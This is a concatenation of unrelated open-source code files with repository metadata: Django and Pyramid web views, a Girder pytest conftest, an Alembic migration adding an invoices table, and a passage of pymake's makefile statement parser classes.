'name': '_displayEditLink',
'created_at': '_displayDate',
'action': '_displayActionLink',
}
actions = {
'create': 'company-create',
'update': 'company-update',
'delete': 'company-delete',
'index': 'company-index',
}
orderingColumns = {'id', 'name', 'created_at'}
searchColumns = {'name', 'teaser', 'content'}
class CompanyCreate(LoginRequiredMixin, CreateView):
model = Company
form_class = CompanyForm
actions = CompanyList.actions
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': _('Company'), 'url': 'cms:portfolio:company-index'}, \
{'name': self.name, 'url': 'cms:portfolio:company-create'}
class CompanyUpdate(LoginRequiredMixin, UpdateView):
model = Company
form_class = CompanyForm
actions = CompanyList.actions
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': _('Company'), 'url': 'cms:portfolio:company-index'}, \
{'name': self.name, 'url': 'cms:portfolio:company-update',
'pk': self.get_object().pk}
class CompanyDelete(LoginRequiredMixin, DeleteView):
model = Company
actions = CompanyList.actions
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': _('Company'), 'url': 'cms:portfolio:company-index'}, \
{'name': self.name, 'url': 'cms:portfolio:company-delete',
'pk': self.get_object().pk}
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
success_url = self.get_success_url()
try:
self.object.delete()
messages.success(request, _('Entry has been deleted'))
return http.HttpResponseRedirect(success_url)
except:
messages.error(request, _('An error has occurred'))
| {
"content_hash": "82416dc6ae6e423f79fcce292cd16b7c",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 78,
"avg_line_length": 29.6,
"alnum_prop": 0.5812543312543312,
"repo_name": "Alkemic/webpage",
"id": "4d0722a82b151ba5881e6088abbbebcb3a2e5914",
"size": "5796",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "module/portfolio/cms/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4649"
},
{
"name": "JavaScript",
"bytes": "287"
},
{
"name": "Python",
"bytes": "115710"
}
],
"symlink_target": ""
} |
from pyramid.response import Response
from pyramid.view import view_config, forbidden_view_config
from pyramid.security import authenticated_userid
from pyramid.renderers import render_to_response
from velruse import login_url
from datetime import datetime
import re
import pyramid.httpexceptions as exc
import logging
import sqlalchemy.exc
from pi_director.models.models import (
DBSession,
RasPi,
)
from pi_director.models.UserModel import UserModel
from pi_director.security import (
groupfinder,
)
from pi_director.controllers.controllers import (
get_pis,
get_logs,
get_tagged_pis,
)
from pi_director.controllers.user_controls import get_users
@forbidden_view_config(renderer="pi_director:templates/forbidden.mak")
def forbidden(request):
logging.info("Going into forbidden")
m = re.match("^/?(ajax|api).*$", request.path)
if m is not None:
'''we're trying to hit an api or ajax query without authentication'''
logging.warn("Someone tried to hit an ajax/api without authentication. Route: {route}".format(route=request.path))
return Response("{'status':'Forbidden'}")
userid = authenticated_userid(request)
if userid:
logging.info("User exists but some other problem occured, FORBIDDEN.")
group = groupfinder(userid, request)
logging.info("User {user} access level {access}".format(user=userid, access=group))
return ("")
if groupfinder(None, request) is None:
request.session['goingto'] = request.path
logging.info("Should be shunting to login page")
loc = request.route_url('velruse.google-login', _query=(('next', request.path),))
return exc.HTTPFound(location=loc)
@view_config(route_name='provision', permission='anon')
def view_provision(request):
response = render_to_response('pi_director:templates/provision.mak', {}, request=request)
response.content_type = 'text/plain'
return response
@view_config(route_name='home', renderer="pi_director:templates/home.mak", permission="admin")
def view_home(request):
logged_in = authenticated_userid(request)
loginurl = login_url(request, 'google')
PiList = get_pis()
return {"loginurl": loginurl, "logged_in": logged_in, "logouturl": request.route_url('logout'), 'pis': PiList}
@view_config(route_name='users', renderer="pi_director:templates/user.mak", permission="admin")
def view_users(request):
logged_in = authenticated_userid(request)
loginurl = login_url(request, 'google')
UserList = get_users()
return {"loginurl": loginurl, "logged_in": logged_in, "logouturl": request.route_url('logout'), 'users': UserList}
@view_config(route_name='logs', renderer="pi_director:templates/logs.mak", permission='admin')
def view_logs(request):
uuid = request.matchdict['uuid']
logs = get_logs(uuid)
return {"logs": logs, "uuid": uuid}
@view_config(route_name='tagged', renderer="pi_director:templates/home.mak", permission="admin")
def view_tagged(request):
tags = request.matchdict['tags']
tagged_pis = get_tagged_pis(tags)
return {'pis': tagged_pis, 'tags': tags}
@view_config(route_name='wall', renderer="pi_director:templates/wall.mak", permission="user")
def view_wall(request):
tags = request.matchdict['tags']
tagged_pis = get_tagged_pis(tags)
show_list = []
offline_list = []
for pi in tagged_pis:
timediff = datetime.now() - pi.lastseen
if timediff.total_seconds() <= 300:
show_list.append(pi)
else:
offline_list.append(pi)
return {'pis': show_list, 'offline': offline_list}
@view_config(route_name='redirectme')
def redirect_me(request):
uid = request.matchdict['uid']
url = "http://www.stackexchange.com"
try:
row = DBSession.query(RasPi).filter(RasPi.uuid==uid).first()
if row:
url = row.url
logging.info("UID {uid}: {page}".format(uid=row.uuid, page=url))
else:
row = RasPi()
row.uuid = uid
row.url = "http://www.stackexchange.com"
row.landscape = True
row.browser = True
DBSession.add(row)
DBSession.flush()
logging.warn("UID {uid} NOT FOUND. ADDED TO TABLE WITH DEFAULT URL".format(uid=uid))
url = row.url
except Exception:
logging.error("Something went south with DB when searching for {uid}".format(uid=uid))
raise exc.HTTPFound(url)
| {
"content_hash": "ec1e2bf46c6ae3f1091fac9a6975feee",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 123,
"avg_line_length": 34.63076923076923,
"alnum_prop": 0.6688138605064415,
"repo_name": "PeterGrace/pi_director",
"id": "fd359b5f13c573ccde6104e7845c4feb16ffb7b5",
"size": "4502",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pi_director/views/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3754"
},
{
"name": "JavaScript",
"bytes": "5866"
},
{
"name": "Makefile",
"bytes": "22288"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "54730"
},
{
"name": "Shell",
"bytes": "4992"
}
],
"symlink_target": ""
} |
import os
import subprocess
import pytest
pytestmark = pytest.mark.girder
@pytest.fixture
def unavailableWorker(db):
"""
Make sure that Girder Worker can't be reached and times out quickly.
"""
from girder_worker.girder_plugin.constants import PluginSettings as WorkerSettings
from girder.models.setting import Setting
# Use an invalid broker to make sure we don't connect to girder_worker so
# this will be incomplete. We don't want to use amqp as it will retry a
# very long time. The mongodb backend is deprecated and throws many
# warnings, but works for this test condition.
Setting().set(WorkerSettings.BROKER, 'mongodb://0.0.0.0')
Setting().set(WorkerSettings.BACKEND, 'mongodb://0.0.0.0')
yield True
Setting().unset(WorkerSettings.BROKER)
Setting().unset(WorkerSettings.BACKEND)
@pytest.fixture(scope='session')
def girderWorkerProcess():
broker = 'amqp://[email protected]'
backend = 'rpc://[email protected]'
env = os.environ.copy()
env['C_FORCE_ROOT'] = 'true'
proc = subprocess.Popen([
'celery', '-A', 'girder_worker.app', '--broker', broker,
'--result-backend', backend, 'worker', '--concurrency=1'],
close_fds=True, env=env)
yield True
proc.terminate()
proc.wait()
@pytest.fixture
def girderWorker(db, girderWorkerProcess):
"""
Run an instance of Girder worker, connected to rabbitmq. The rabbitmq
service must be running.
"""
from girder_worker.girder_plugin.constants import PluginSettings as WorkerSettings
from girder.models.setting import Setting
broker = 'amqp://[email protected]'
backend = 'rpc://[email protected]'
Setting().set(WorkerSettings.BROKER, broker)
Setting().set(WorkerSettings.BACKEND, backend)
yield True
Setting().unset(WorkerSettings.BROKER)
Setting().unset(WorkerSettings.BACKEND)
def unbindGirderEventsByHandlerName(handlerName):
from girder import events
for eventName in events._mapping:
events.unbind(eventName, handlerName)
@pytest.fixture
def unbindLargeImage(db):
yield True
unbindGirderEventsByHandlerName('large_image')
| {
"content_hash": "dcfeb119d868fd681e6faed14facd5cb",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 86,
"avg_line_length": 29.698630136986303,
"alnum_prop": 0.698339483394834,
"repo_name": "girder/large_image",
"id": "295ed9f1b782133f26b8680a87cc464dde4ffaa6",
"size": "2168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "girder/test_girder/conftest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "7114"
},
{
"name": "JavaScript",
"bytes": "307859"
},
{
"name": "Pug",
"bytes": "21406"
},
{
"name": "Python",
"bytes": "1371949"
},
{
"name": "Shell",
"bytes": "5500"
},
{
"name": "Stylus",
"bytes": "4261"
}
],
"symlink_target": ""
} |
"""added invoice model
Revision ID: a15fe29fe566
Revises: bdb82b2b0eb0
Create Date: 2016-04-14 20:44:53.860856
"""
# revision identifiers, used by Alembic.
revision = 'a15fe29fe566'
down_revision = 'bdb82b2b0eb0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('invoices',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('owner_id', sa.Integer(), nullable=False),
sa.Column('ref_num', sa.Integer(), nullable=False),
sa.Column('issued_on', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('invoices')
### end Alembic commands ###
| {
"content_hash": "ca04ffc3852363d153b8787234ab108a",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 63,
"avg_line_length": 26.606060606060606,
"alnum_prop": 0.6708428246013668,
"repo_name": "skazi0/yaia",
"id": "c9070390f832f89144869b4502ca39445ddca5b9",
"size": "878",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/a15fe29fe566_added_invoice_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1086"
},
{
"name": "HTML",
"bytes": "22096"
},
{
"name": "JavaScript",
"bytes": "16701"
},
{
"name": "Makefile",
"bytes": "885"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "42526"
},
{
"name": "Shell",
"bytes": "1009"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import logging, re, os
import data, parser, util
from pymake.globrelative import hasglob, glob
from pymake import errors
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
_log = logging.getLogger('pymake.data')
_tabwidth = 4
class Location(object):
"""
A location within a makefile.
For the moment, locations are just path/line/column, but in the future
they may reference parent locations for more accurate "included from"
or "evaled at" error reporting.
"""
__slots__ = ('path', 'line', 'column')
def __init__(self, path, line, column):
self.path = path
self.line = line
self.column = column
def offset(self, s, start, end):
"""
Returns a new location offset by
the specified string.
"""
if start == end:
return self
skiplines = s.count('\n', start, end)
line = self.line + skiplines
if skiplines:
lastnl = s.rfind('\n', start, end)
assert lastnl != -1
start = lastnl + 1
column = 0
else:
column = self.column
while True:
j = s.find('\t', start, end)
if j == -1:
column += end - start
break
column += j - start
column += _tabwidth
column -= column % _tabwidth
start = j + 1
return Location(self.path, line, column)
def __str__(self):
return "%s:%s:%s" % (self.path, self.line, self.column)
def _expandwildcards(makefile, tlist):
for t in tlist:
if not hasglob(t):
yield t
else:
l = glob(makefile.workdir, t)
for r in l:
yield r
_flagescape = re.compile(r'([\s\\])')
def parsecommandlineargs(args):
"""
Given a set of arguments from a command-line invocation of make,
parse out the variable definitions and return (stmts, arglist, overridestr)
"""
overrides = []
stmts = StatementList()
r = []
for i in range(0, len(args)):
a = args[i]
vname, t, val = util.strpartition(a, ':=')
if t == '':
vname, t, val = util.strpartition(a, '=')
if t != '':
overrides.append(_flagescape.sub(r'\\\1', a))
vname = vname.strip()
vnameexp = data.Expansion.fromstring(vname, "Command-line argument")
stmts.append(ExportDirective(vnameexp, concurrent_set=True))
stmts.append(SetVariable(vnameexp, token=t,
value=val, valueloc=Location('<command-line>', i, len(vname) + len(t)),
targetexp=None, source=data.Variables.SOURCE_COMMANDLINE))
else:
r.append(data.stripdotslash(a))
return stmts, r, ' '.join(overrides)
class Statement(object):
"""
Represents parsed make file syntax.
This is an abstract base class. Child classes are expected to implement
basic methods defined below.
"""
def execute(self, makefile, context):
"""Executes this Statement within a make file execution context."""
raise Exception("%s must implement execute()." % self.__class__)
def to_source(self):
"""Obtain the make file "source" representation of the Statement.
This converts an individual Statement back to a string that can again
be parsed into this Statement.
"""
raise Exception("%s must implement to_source()." % self.__class__)
def __eq__(self, other):
raise Exception("%s must implement __eq__." % self.__class__)
def __ne__(self, other):
return self.__eq__(other)
class DummyRule(object):
__slots__ = ()
def addcommand(self, r):
pass
class Rule(Statement):
"""
Rules represent how to make specific targets.
See https://www.gnu.org/software/make/manual/make.html#Rules.
An individual rule is composed of a target, dependencies, and a recipe.
This class only contains references to the first 2. The recipe will be
contained in Command classes which follow this one in a stream of Statement
instances.
Instances also contain a boolean property `doublecolon` which says whether
this is a doublecolon rule. Doublecolon rules are rules that are always
executed, if they are evaluated. Normally, rules are only executed if their
target is out of date.
"""
__slots__ = ('targetexp', 'depexp', 'doublecolon')
def __init__(self, targetexp, depexp, doublecolon):
assert isinstance(targetexp, (data.Expansion, data.StringExpansion))
assert isinstance(depexp, (data.Expansion, data.StringExpansion))
self.targetexp = targetexp
self.depexp = depexp
self.doublecolon = doublecolon
def execute(self, makefile, context):
if context.weak:
self._executeweak(makefile, context)
else:
self._execute(makefile, context)
def _executeweak(self, makefile, context):
"""
If the context is weak (we're just handling dependencies) we can make a number of assumptions here.
This lets us go really fast and is generally good.
"""
assert context.weak
deps = self.depexp.resolvesplit(makefile, makefile.variables)
# Skip targets with no rules and no dependencies
if not deps:
return
targets = data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))
rule = data.Rule(list(data.stripdotslashes(deps)), self.doublecolon, loc=self.targetexp.loc, weakdeps=True)
for target in targets:
makefile.gettarget(target).addrule(rule)
makefile.foundtarget(target)
context.currule = rule
def _execute(self, makefile, context):
assert not context.weak
atargets = data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))
targets = [data.Pattern(p) for p in _expandwildcards(makefile, atargets)]
if not len(targets):
context.currule = DummyRule()
return
ispatterns = set((t.ispattern() for t in targets))
if len(ispatterns) == 2:
raise errors.DataError("Mixed implicit and normal rule", self.targetexp.loc)
ispattern, = ispatterns
deps = list(_expandwildcards(makefile, data.stripdotslashes(self.depexp.resolvesplit(makefile, makefile.variables))))
if ispattern:
prerequisites = [data.Pattern(d) for d in deps]
rule = data.PatternRule(targets, prerequisites, self.doublecolon, loc=self.targetexp.loc)
makefile.appendimplicitrule(rule)
else:
rule = data.Rule(deps, self.doublecolon, loc=self.targetexp.loc, weakdeps=False)
for t in targets:
makefile.gettarget(t.gettarget()).addrule(rule)
makefile.foundtarget(targets[0].gettarget())
context.currule = rule
def dump(self, fd, indent):
print("%sRule %s: %s" % (indent, self.targetexp, self.depexp), file=fd)
def to_source(self):
sep = ':'
if self.doublecolon:
sep = '::'
deps = self.depexp.to_source()
if len(deps) > 0 and not deps[0].isspace():
sep += ' '
return '\n%s%s%s' % (
self.targetexp.to_source(escape_variables=True),
sep,
deps)
def __eq__(self, other):
if not isinstance(other, Rule):
return False
return self.targetexp == other.targetexp \
and self.depexp == other.depexp \
and self.doublecolon == other.doublecolon
class StaticPatternRule(Statement):
"""
Static pattern rules are rules which specify multiple targets based on a
string pattern.
See https://www.gnu.org/software/make/manual/make.html#Static-Pattern
They are like `Rule` instances except an added property, `patternexp` is
present. It contains the Expansion which represents the rule pattern.
"""
__slots__ = ('targetexp', 'patternexp', 'depexp', 'doublecolon')
def __init__(self, targetexp, patternexp, depexp, doublecolon):
assert isinstance(targetexp, (data.Expansion, data.StringExpansion))
assert isinstance(patternexp, (data.Expansion, data.StringExpansion))
assert isinstance(depexp, (data.Expansion, data.StringExpansion))
self.targetexp = targetexp
self.patternexp = patternexp
self.depexp = depexp
self.doublecolon = doublecolon
def execute(self, makefile, context):
if context.weak:
raise errors.DataError("Static pattern rules not allowed in includedeps", self.targetexp.loc)
targets = list(_expandwildcards(makefile, data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))))
if not len(targets):
context.currule = DummyRule()
return
patterns = list(data.stripdotslashes(self.patternexp.resolvesplit(makefile, makefile.variables)))
if len(patterns) != 1:
raise errors.DataError("Static pattern rules must have a single pattern", self.patternexp.loc)
pattern = data.Pattern(patterns[0])
deps = [data.Pattern(p) for p in _expandwildcards(makefile, data.stripdotslashes(self.depexp.resolvesplit(makefile, makefile.variables)))]
rule = data.PatternRule([pattern], deps, self.doublecolon, loc=self.targetexp.loc)
for t in targets:
if data.Pattern(t).ispattern():
raise errors.DataError("Target '%s' of a static pattern rule must not be a pattern" % (t,), self.targetexp.loc)
stem = pattern.match(t)
if stem is None:
raise errors.DataError("Target '%s' does not match the static pattern '%s'" % (t, pattern), self.targetexp.loc)
makefile.gettarget(t).addrule(data.PatternRuleInstance(rule, '', stem, pattern.ismatchany()))
makefile.foundtarget(targets[0])
context.currule = rule
def dump(self, fd, indent):
print("%sStaticPatternRule %s: %s: %s" % (indent, self.targetexp, self.patternexp, self.depexp), file=fd)
def to_source(self):
sep = ':'
if self.doublecolon:
sep = '::'
pattern = self.patternexp.to_source()
deps = self.depexp.to_source()
if len(pattern) > 0 and pattern[0] not in (' ', '\t'):
sep += ' '
return '\n%s%s%s:%s' % (
self.targetexp.to_source(escape_variables=True),
sep,
pattern,
deps)
def __eq__(self, other):
if not isinstance(other, StaticPatternRule):
return False
return self.targetexp == other.targetexp \
and self.patternexp == other.patternexp \
and self.depexp == other.depexp \
and self.doublecolon == other.doublecolon
class Command(Statement):
"""
Commands are things that get executed by a rule.
A rule's recipe is composed of 0 or more Commands.
A command is simply an expansion. Commands typically represent strings to
be executed in a shell (e.g. via system()). Although, since make files
allow arbitrary shells to be used for command execution, this isn't a
guarantee.
"""
__slots__ = ('exp',)
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
def execute(self, makefile, context):
assert context.currule is not None
if context.weak:
raise errors.DataError("rules not allowed in includedeps", self.exp.loc)
context.currule.addcommand(self.exp)
def dump(self, fd, indent):
print("%sCommand %s" % (indent, self.exp,), file=fd)
def to_source(self):
# Commands have some interesting quirks when it comes to source
# formatting. First, they can be multi-line. Second, a tab needs to be
# inserted at the beginning of every line. Finally, there might be
# variable references inside the command. This means we need to escape
# variable references inside command strings. Luckily, this is handled
# by the Expansion.
s = self.exp.to_source(escape_variables=True)
return '\n'.join(['\t%s' % line for line in s.split('\n')])
def __eq__(self, other):
if not isinstance(other, Command):
return False
return self.exp == other.exp
class SetVariable(Statement):
"""
Represents a variable assignment.
Variable assignment comes in two different flavors.
Simple assignment has the form:
<Expansion> <Assignment Token> <string>
e.g. FOO := bar
These correspond to the fields `vnameexp`, `token`, and `value`. In
addition, `valueloc` will be a Location and `source` will be a
pymake.data.Variables.SOURCE_* constant.
There are also target-specific variables. These are variables that only
apply in the context of a specific target. They are like the aforementioned
assignment except the `targetexp` field is set to an Expansion representing
the target they apply to.
"""
__slots__ = ('vnameexp', 'token', 'value', 'valueloc', 'targetexp', 'source')
def __init__(self, vnameexp, token, value, valueloc, targetexp, source=None):
assert isinstance(vnameexp, (data.Expansion, data.StringExpansion))
assert isinstance(value, str)
assert targetexp is None or isinstance(targetexp, (data.Expansion, data.StringExpansion))
if source is None:
source = data.Variables.SOURCE_MAKEFILE
self.vnameexp = vnameexp
self.token = token
self.value = value
self.valueloc = valueloc
self.targetexp = targetexp
self.source = source
def execute(self, makefile, context):
vname = self.vnameexp.resolvestr(makefile, makefile.variables)
if len(vname) == 0:
raise errors.DataError("Empty variable name", self.vnameexp.loc)
if self.targetexp is None:
setvariables = [makefile.variables]
else:
setvariables = []
targets = [data.Pattern(t) for t in data.stripdotslashes(self.targetexp.resolvesplit(makefile, makefile.variables))]
for t in targets:
if t.ispattern():
setvariables.append(makefile.getpatternvariables(t))
else:
setvariables.append(makefile.gettarget(t.gettarget()).variables)
for v in setvariables:
if self.token == '+=':
v.append(vname, self.source, self.value, makefile.variables, makefile)
continue
if self.token == '?=':
flavor = data.Variables.FLAVOR_RECURSIVE
oldflavor, oldsource, oldval = v.get(vname, expand=False)
if oldval is not None:
continue
value = self.value
elif self.token == '=':
flavor = data.Variables.FLAVOR_RECURSIVE
value = self.value
else:
assert self.token == ':='
flavor = data.Variables.FLAVOR_SIMPLE
d = parser.Data.fromstring(self.value, self.valueloc)
e, t, o = parser.parsemakesyntax(d, 0, (), parser.iterdata)
value = e.resolvestr(makefile, makefile.variables)
v.set(vname, flavor, self.source, value)
def dump(self, fd, indent):
print("%sSetVariable<%s> %s %s\n%s %r" % (indent, self.valueloc, self.vnameexp, self.token, indent, self.value), file=fd)
def __eq__(self, other):
if not isinstance(other, SetVariable):
return False
return self.vnameexp == other.vnameexp \
and self.token == other.token \
and self.value == other.value \
and self.targetexp == other.targetexp \
and self.source == other.source
def to_source(self):
chars = []
for i in range(0, len(self.value)):
c = self.value[i]
# Literal # is escaped in variable assignment otherwise it would be
# a comment.
if c == '#':
# If a backslash precedes this, we need to escape it as well.
if i > 0 and self.value[i-1] == '\\':
chars.append('\\')
chars.append('\\#')
continue
chars.append(c)
value = ''.join(chars)
prefix = ''
if self.source == data.Variables.SOURCE_OVERRIDE:
prefix = 'override '
# SetVariable come in two flavors: simple and target-specific.
# We handle the target-specific syntax first.
if self.targetexp is not None:
return '%s: %s %s %s' % (
self.targetexp.to_source(),
self.vnameexp.to_source(),
self.token,
value)
# The variable could be multi-line or have leading whitespace. For
# regular variable assignment, whitespace after the token but before
# the value is ignored. If we see leading whitespace in the value here,
# the variable must have come from a define.
if value.count('\n') > 0 or (len(value) and value[0].isspace()):
# The parser holds the token in vnameexp for whatever reason.
return '%sdefine %s\n%s\nendef' % (
prefix,
self.vnameexp.to_source(),
value)
return '%s%s %s %s' % (
prefix,
self.vnameexp.to_source(),
self.token,
value)
class Condition(object):
"""
An abstract "condition", either ifeq or ifdef, perhaps negated.
See https://www.gnu.org/software/make/manual/make.html#Conditional-Syntax
Subclasses must implement:
def evaluate(self, makefile)
"""
def __eq__(self, other):
raise Exception("%s must implement __eq__." % __class__)
def __ne__(self, other):
return not self.__eq__(other)
class EqCondition(Condition):
"""
Represents an ifeq or ifneq conditional directive.
This directive consists of two Expansions which are compared for equality.
The `expected` field is a bool indicating what the condition must evaluate
to in order for its body to be executed. If True, this is an "ifeq"
conditional directive. If False, an "ifneq."
"""
__slots__ = ('exp1', 'exp2', 'expected')
def __init__(self, exp1, exp2):
assert isinstance(exp1, (data.Expansion, data.StringExpansion))
assert isinstance(exp2, (data.Expansion, data.StringExpansion))
self.expected = True
self.exp1 = exp1
self.exp2 = exp2
def evaluate(self, makefile):
r1 = self.exp1.resolvestr(makefile, makefile.variables)
r2 = self.exp2.resolvestr(makefile, makefile.variables)
return (r1 == r2) == self.expected
def __str__(self):
return "ifeq (expected=%s) %s %s" % (self.expected, self.exp1, self.exp2)
def __eq__(self, other):
if not isinstance(other, EqCondition):
return False
return self.exp1 == other.exp1 \
and self.exp2 == other.exp2 \
and self.expected == other.expected
class IfdefCondition(Condition):
"""
Represents an ifdef or ifndef conditional directive.
This directive consists of a single expansion which represents the name of
a variable (without the leading '$') which will be checked for definition.
The `expected` field is a bool and has the same behavior as EqCondition.
If it is True, this represents a "ifdef" conditional. If False, "ifndef."
"""
__slots__ = ('exp', 'expected')
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
self.expected = True
def evaluate(self, makefile):
vname = self.exp.resolvestr(makefile, makefile.variables)
flavor, source, value = makefile.variables.get(vname, expand=False)
if value is None:
return not self.expected
return (len(value) > 0) == self.expected
def __str__(self):
return "ifdef (expected=%s) %s" % (self.expected, self.exp)
def __eq__(self, other):
if not isinstance(other, IfdefCondition):
return False
return self.exp == other.exp and self.expected == other.expected
class ElseCondition(Condition):
"""
Represents the transition between branches in a ConditionBlock.
"""
__slots__ = ()
def evaluate(self, makefile):
return True
def __str__(self):
return "else"
def __eq__(self, other):
return isinstance(other, ElseCondition)
class ConditionBlock(Statement):
"""
A set of related Conditions.
This is essentially a list of 2-tuples of (Condition, list(Statement)).
The parser creates a ConditionBlock for all statements related to the same
conditional group. If iterating over the parser's output, where you think
you would see an ifeq, you will see a ConditionBlock containing an IfEq. In
other words, the parser collapses separate statements into this container
class.
ConditionBlock instances may exist within other ConditionBlock if the
conditional logic is multiple levels deep.
"""
__slots__ = ('loc', '_groups')
def __init__(self, loc, condition):
self.loc = loc
self._groups = []
self.addcondition(loc, condition)
def getloc(self):
return self.loc
def addcondition(self, loc, condition):
assert isinstance(condition, Condition)
condition.loc = loc
if len(self._groups) and isinstance(self._groups[-1][0], ElseCondition):
raise errors.SyntaxError("Multiple else conditions for block starting at %s" % self.loc, loc)
self._groups.append((condition, StatementList()))
def append(self, statement):
self._groups[-1][1].append(statement)
def execute(self, makefile, context):
i = 0
for c, statements in self._groups:
if c.evaluate(makefile):
_log.debug("Condition at %s met by clause #%i", self.loc, i)
statements.execute(makefile, context)
return
i += 1
def dump(self, fd, indent):
print("%sConditionBlock" % (indent,), file=fd)
indent2 = indent + ' '
for c, statements in self._groups:
print("%s Condition %s" % (indent, c), file=fd)
statements.dump(fd, indent2)
print("%s ~Condition" % (indent,), file=fd)
print("%s~ConditionBlock" % (indent,), file=fd)
def to_source(self):
lines = []
index = 0
for condition, statements in self:
lines.append(ConditionBlock.condition_source(condition, index))
index += 1
for statement in statements:
lines.append(statement.to_source())
lines.append('endif')
return '\n'.join(lines)
def __eq__(self, other):
if not isinstance(other, ConditionBlock):
return False
if len(self) != len(other):
return False
for i in range(0, len(self)):
our_condition, our_statements = self[i]
other_condition, other_statements = other[i]
if our_condition != other_condition:
return False
if our_statements != other_statements:
return False
return True
@staticmethod
def condition_source(statement, index):
"""Convert a condition to its source representation.
The index argument defines the index of this condition inside a
ConditionBlock. If it is greater than 0, an "else" will be prepended
to the result, if necessary.
"""
prefix = ''
if isinstance(statement, (EqCondition, IfdefCondition)) and index > 0:
prefix = 'else '
if isinstance(statement, IfdefCondition):
s = statement.exp.s
if statement.expected:
return '%sifdef %s' % (prefix, s)
return '%sifndef %s' % (prefix, s)
if isinstance(statement, EqCondition):
args = [
statement.exp1.to_source(escape_comments=True),
statement.exp2.to_source(escape_comments=True)]
use_quotes = False
single_quote_present = False
double_quote_present = False
for i, arg in enumerate(args):
if len(arg) > 0 and (arg[0].isspace() or arg[-1].isspace()):
use_quotes = True
if "'" in arg:
single_quote_present = True
if '"' in arg:
double_quote_present = True
# Quote everything if needed.
if single_quote_present and double_quote_present:
raise Exception('Cannot format condition with multiple quotes.')
if use_quotes:
for i, arg in enumerate(args):
# Double to single quotes.
if single_quote_present:
args[i] = '"' + arg + '"'
else:
args[i] = "'" + arg + "'"
body = None
if use_quotes:
body = ' '.join(args)
else:
body = '(%s)' % ','.join(args)
if statement.expected:
return '%sifeq %s' % (prefix, body)
return '%sifneq %s' % (prefix, body)
if isinstance(statement, ElseCondition):
return 'else'
raise Exception('Unhandled Condition statement: %s' %
statement.__class__)
def __iter__(self):
return iter(self._groups)
def __len__(self):
return len(self._groups)
def __getitem__(self, i):
return self._groups[i]
class Include(Statement):
"""
Represents the include directive.
See https://www.gnu.org/software/make/manual/make.html#Include
The file to be included is represented by the Expansion defined in the
field `exp`. `required` is a bool indicating whether execution should fail
if the specified file could not be processed.
"""
__slots__ = ('exp', 'required', 'deps')
def __init__(self, exp, required, weak):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
self.required = required
self.weak = weak
def execute(self, makefile, context):
files = self.exp.resolvesplit(makefile, makefile.variables)
for f in files:
makefile.include(f, self.required, loc=self.exp.loc, weak=self.weak)
def dump(self, fd, indent):
print("%sInclude %s" % (indent, self.exp), file=fd)
def to_source(self):
prefix = ''
if not self.required:
prefix = '-'
return '%sinclude %s' % (prefix, self.exp.to_source())
def __eq__(self, other):
if not isinstance(other, Include):
return False
return self.exp == other.exp and self.required == other.required
class VPathDirective(Statement):
"""
Represents the vpath directive.
See https://www.gnu.org/software/make/manual/make.html#Selective-Search
"""
__slots__ = ('exp',)
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
def execute(self, makefile, context):
words = list(data.stripdotslashes(self.exp.resolvesplit(makefile, makefile.variables)))
if len(words) == 0:
makefile.clearallvpaths()
else:
pattern = data.Pattern(words[0])
mpaths = words[1:]
if len(mpaths) == 0:
makefile.clearvpath(pattern)
else:
dirs = []
for mpath in mpaths:
dirs.extend((dir for dir in mpath.split(os.pathsep)
if dir != ''))
if len(dirs):
makefile.addvpath(pattern, dirs)
def dump(self, fd, indent):
print("%sVPath %s" % (indent, self.exp), file=fd)
def to_source(self):
return 'vpath %s' % self.exp.to_source()
def __eq__(self, other):
if not isinstance(other, VPathDirective):
return False
return self.exp == other.exp
class ExportDirective(Statement):
"""
Represents the "export" directive.
This is used to control exporting variables to sub makes.
See https://www.gnu.org/software/make/manual/make.html#Variables_002fRecursion
The `concurrent_set` field defines whether this statement occurred with or
without a variable assignment. If False, no variable assignment was
present. If True, the SetVariable immediately following this statement
originally came from this export directive (the parser splits it into
multiple statements).
"""
__slots__ = ('exp', 'concurrent_set')
def __init__(self, exp, concurrent_set):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
self.concurrent_set = concurrent_set
def execute(self, makefile, context):
if self.concurrent_set:
vlist = [self.exp.resolvestr(makefile, makefile.variables)]
else:
vlist = list(self.exp.resolvesplit(makefile, makefile.variables))
if not len(vlist):
